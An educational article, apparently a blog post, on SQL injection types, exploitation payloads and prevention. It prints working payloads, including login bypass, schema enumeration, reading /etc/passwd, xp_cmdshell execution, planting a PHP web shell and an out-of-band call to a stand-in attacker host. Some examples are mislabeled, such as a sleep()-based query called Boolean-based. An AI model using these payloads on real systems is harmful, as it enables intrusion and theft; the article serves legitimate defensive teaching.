Introduction
SQL Injection (SQLi) is a critical web security vulnerability that allows attackers to manipulate a website's database by injecting malicious SQL queries. Despite awareness, it remains one of the most prevalent threats, often leading to data breaches, unauthorized access, and even complete server takeover. In this article, we will explore advanced SQLi techniques, real-world exploitation methods, and robust prevention mechanisms.
Types of SQL Injection
1. Classic SQL Injection
Basic SQL Injection manipulates input fields to modify SQL queries. The most common example is bypassing login authentication:
SELECT * FROM users WHERE username = '' OR '1'='1' -- ' AND password = 'password';
The OR '1'='1' condition always evaluates to TRUE, granting unauthorized access.
2. Blind SQL Injection
In Blind SQLi, attackers infer database information by observing system responses or delays.
- Boolean-based Blind SQLi
SELECT * FROM users WHERE username = 'admin' AND IF(1=1, sleep(5), false);
If the application's response is delayed by 5 seconds, the attacker confirms the SQL injection vulnerability.
- Time-based Blind SQLi exploits database functions like SLEEP(), BENCHMARK(), or WAITFOR DELAY.
3. Error-Based SQL Injection
This technique extracts information by triggering database errors:
SELECT * FROM users WHERE id = 1 UNION SELECT @@version, NULL, NULL;
If the database error discloses version information, SQLi is possible.
4. UNION-Based SQL Injection
Attackers use UNION to merge malicious queries with the original SQL statement:
SELECT username, password FROM users WHERE id = 1 UNION SELECT database(), user();
This reveals database names and user details.
5. Out-of-Band SQL Injection
Exploiting SQL functions to send data to an external server:
SELECT LOAD_FILE('\\attacker-server.com\data');
This method is effective when error messages and time delays are unavailable.
Exploitation Techniques
Identifying Vulnerable Parameters
- Using special characters: Inject ", --, #, /* to test response changes.
- Testing UNION-based SQLi:
' UNION SELECT 1,2,3--
- Checking database type:
- MySQL:
SELECT version();
- MSSQL:
SELECT @@version;
- PostgreSQL:
SELECT current_database();
Advanced Payloads
- Extracting table names:
UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database();
- Extracting column names:
UNION SELECT column_name FROM information_schema.columns WHERE table_name='users';
- Reading files (MySQL):
UNION SELECT LOAD_FILE('/etc/passwd');
Privilege Escalation & Database Takeover
If xp_cmdshell is enabled in MSSQL:
EXEC xp_cmdshell 'whoami';
For MySQL with secure_file_priv disabled:
SELECT 'malicious_code' INTO OUTFILE '/var/www/html/shell.php';
Prevention Techniques
1. Use Prepared Statements (Parameterized Queries)
Instead of concatenating user input, use prepared statements:
cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (user, password))
This ensures user input is treated as data, not executable SQL.
2. Input Validation & Whitelisting
- Enforce strict input validation.
- Allow only expected characters (e.g., regex restrictions on usernames and IDs).
3. Least Privilege Principle
- Use read-only database users when possible.
- Restrict access to critical system tables.
4. Web Application Firewalls (WAFs)
Deploy WAFs like ModSecurity to detect and block SQLi attempts.
5. Monitor & Log Database Activities
Enable query logging and set up alerts for suspicious database queries.
6. Disable Dangerous Features
- Disable xp_cmdshell in MSSQL.
- Restrict LOAD_FILE() and OUTFILE in MySQL.
Conclusion
SQL Injection remains a severe threat, but by employing a multi-layered defense, developers can significantly reduce the risk. Regular code audits, input sanitization, and security best practices are essential in preventing SQLi attacks. Stay informed, test your applications, and secure your databases against evolving threats.